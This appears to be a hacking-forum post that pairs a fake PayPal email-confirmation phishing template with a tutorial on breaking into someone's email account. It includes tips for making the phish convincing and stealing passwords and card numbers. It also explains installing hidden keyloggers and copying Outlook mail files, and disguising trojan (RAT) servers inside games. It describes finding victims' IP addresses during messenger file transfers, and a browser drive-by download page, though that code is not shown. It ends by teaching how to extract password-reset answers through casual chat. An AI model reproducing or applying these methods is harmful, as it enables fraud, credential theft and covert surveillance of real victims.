  • Visit the PayPal Security Center.
Confirm Your Email Address!

Dear Black Bay,


To complete your PayPal account, you must click the link below and enter your password on the following page to confirm your email address.

Click here to activate your account
You can also confirm your email address by logging into your PayPal account at https://www.paypal.com/row/. Click on Confirm Email in the To Do List and then enter this confirmation number: 1423-5450-0472-3892-5873

Sincerely,
PayPal


Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click the Help link in the top right corner of any PayPal page.

To receive email notifications in plain text instead of HTML, update your preferences.
Copyright © 1999-2008 PayPal. All rights reserved.

Consumer advisory- PayPal Pte. Ltd., the holder of PayPal’s stored value
facility, does not require the approval of the Monetary Authority of Singapore.
Users are advised to read the terms and conditions carefully.

PayPal Email ID PP468
This is a basic format [layout]. Change the text contents as you need.

[Tips: Before sending the phisher link, go to the PayPal site, click on "Forgot Password" and select verification by e-mail! Do this 3-5 times. This would make the scene more convincing]

Now you can tell your victim that his account has been accessed by a third person, blah-blah. Make the email better!

If he logs in, then you could get his login e-mail, password and probably his CC! So no need to panic about the "SECURITY MEASURES LIMITATION"

The success rate and cashing rate of this method are somewhat high.

The reason I am posting it here is that my next tutorial is on "UNPHISHING PAYPALs", so you should know my method of phishing too!

I put a lot of time into this tutorial, please comment.

Crack into someone's email.

Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when pursuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...


Things You Should Know
As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They cannot be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know: if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well, that concludes this section; now let's get to what you want to know.



If You Have Physical Access
I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out


Code:
www.google.com
to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at)


Code:
www.blazingtools.com/bpk.html
It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on

different file sharing clients you can try).


Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait until the next time they log in to their email account. You will then have the password for the account. Another option you have, if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy and extract the emails at home (the dbx file stores the messages kept in each Outlook folder of a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\Application Data\Identities\{ACblahblahblah}\Microsoft\Outlook Express\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....





Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thus taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.



One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host its service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that its server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger. Google it.




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory from which you executed it. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well, that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...



If You Don't Have Physical Access
Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order not to raise any doubt when the program appears to do nothing when it is executed. For this you can use a tool that binds it, like any exe file, into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to

, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.


The reason is that you need the IP address of the user in order to connect to the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now, while this transfer is going on, you will go to Start, then Run, type in "command", and press Enter. Once the MS-DOS prompt is open, type in "netstat -n", and again press Enter. You will see a list of IP addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an HTML document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then embed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait until the next time they type in their email password. However, what do you do if you cannot contact this user in any way to do any of the above tricks? Well, then you definitely have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to get through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/zip code questions with ease, and, with a little mental backtracking or social engineering (talking) the information out of the user, be able to get past the secret question. However, what do you do if you do not have this luxury? Well, in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...